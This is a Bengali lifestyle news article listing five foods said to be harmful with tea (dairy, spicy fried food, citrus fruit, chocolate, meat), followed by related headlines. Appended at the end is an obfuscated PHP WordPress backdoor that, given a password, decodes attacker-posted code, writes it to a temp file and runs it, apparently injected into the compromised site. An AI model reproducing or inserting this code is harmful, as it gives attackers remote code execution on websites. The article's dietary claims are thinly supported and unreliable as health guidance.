শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

চায়ের সঙ্গে যে ৫ খাবার কখনোই খাবেন না

news-image

লাইফস্টাইল ডেস্ক : পৃথিবীর সবচেয়ে জনপ্রিয় পানীয়ের নাম সম্ভবত চা। কারণ আপনি যে দেশেই যান না কেন, এই পানীয় পাবেনই। চা খেতে পছন্দ করেন না এমন মানুষ কমই রয়েছে। কফিও বেশ জনপ্রিয় তবে চায়ের মতো নয়। সকালের নাস্তায়, বিকেলে বন্ধুদের সঙ্গে আড্ডায় কিংবা অবসরে বই পড়তে পড়তে চায়ের কাপে চুমুক দেন নিশ্চয়ই? এই চায়ের সঙ্গে থাকে আরও কোনো না কোনো খাবার। কিন্তু আপনি জানেন কি, কিছু খাবার রয়েছে যেগুলো চায়ের সঙ্গে খাওয়া ঠিক নয়? চলুন জেনে নেওয়া যাক সেই খাবারগুলো সম্পর্কে-

দুগ্ধজাত খাবার
দুধ চা আমাদের দেশে বেশ জনপ্রিয়। কিন্তু অবাক করা বিষয় হলো চায়ের সঙ্গে দুগ্ধজাত কোনো খাবারই খাওয়া ঠিক নয়। কারণ আপনি যদি চায়ের সঙ্গে দুধ মিশিয়ে খান তাহলে চায়ে থাকা অ্যান্টিঅক্সিডেন্ট, ক্যাটোচিন কম কার্যকরী হবে। এছাড়া চায়ের সঙ্গে পনির, দই বা অন্য কোনো দুগ্ধজাত খাবারা খাওয়া একদমই ঠিক নয়। এমনটাই বলছেন বিশেষজ্ঞরা।

মসলাদার খাবার
বৃষ্টির বিকেলে চায়ের সঙ্গে গরম গরম তেলে ভাজার খাবার খেতে বেশ মজাদার। কিন্তু এ ধরনের মজাদার খাবারই আপনার জন্য ক্ষতিকর হতে পারে। বিশেষ করে যখন তা চায়ের সঙ্গে খাওয়া হয়। সুস্বাস্থ্য বজায় রাখতে চাইলে চায়ের সঙ্গে তেল-মসলাযুক্ত খাবার সব সময় এড়িয়ে চলতে হবে। কারণ চায়ের ট্যানিনের সঙ্গে মসলাদার খাবার মিলে হজমের সমস্যা তৈরি হতে পারে। তাই এদিকে খেয়াল রাখুন।

ফল
অনেক বাড়িতে নাস্তার ট্রেতে অনেক রকম খাবার সাজিয়ে সামনে আনা হয়। তাতে অনেক সময় চা এবং নানা রকম ফলও থাকে। এমনটা আপনিও দেখে থাকবেন। তবে চায়ের সঙ্গে ফল বিশেষ করে কমলা, লেবু, আঙ্গুর বা সাইট্রিক অ্যাসিড সমৃদ্ধ ফল খাওয়া একদমই ঠিক নয়। কারণ সাইট্রিক অ্যাসিড সমৃদ্ধ ফল খেলে তা আমাদের পাকস্থলীর পি এইচ ভারসাম্য পরিবর্তন করে, এটি চায়ের সঙ্গে মিলিত হলে অ্যাসিড রিফ্লাক্স বাড়িয়ে দেয়। যে কারণে পেটে ব্যথা দেখা দিতে পারে।

চকোলেট
চকোলেট খেতে যতই পছন্দ করুন না কেন, চায়ের সঙ্গে কখনোই খাবেন না। শুধু চা নয়, ক্যাফেইন সমৃদ্ধ কোনো খাবারের সঙ্গেই চা খাবেন না। কারণ চকোলেট এবং ক্যাফেইন দুটোই উদ্দীপক জনিত খাবার। আর এই দুই খাবার একসঙ্গে খেলে তা অতিরিক্ত ঘাম বা নিদ্রাহীনতার কারণ হতে পারে।

মাংস
মাংসের সঙ্গে সাধারণত চা খাওয়া হয় না। তবে মাংস দিয়ে তৈরি বিভিন্ন মুখরোচক খাবার যেমন পাকোড়া, চিকেন ফ্রাই কিংবা এ ধরনের খাবারের সঙ্গে অনেকে চা খেয়ে থাকেন। এমনটা কখনোই করবেন না। মাংস দেওয়া আছে এমন কোনো খাবার খেলে তখন আর চা খাবেন না। কারণ এতে গ্যাস্ট্রিকের সমস্যা বেড়ে যেতে পারে।

 

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}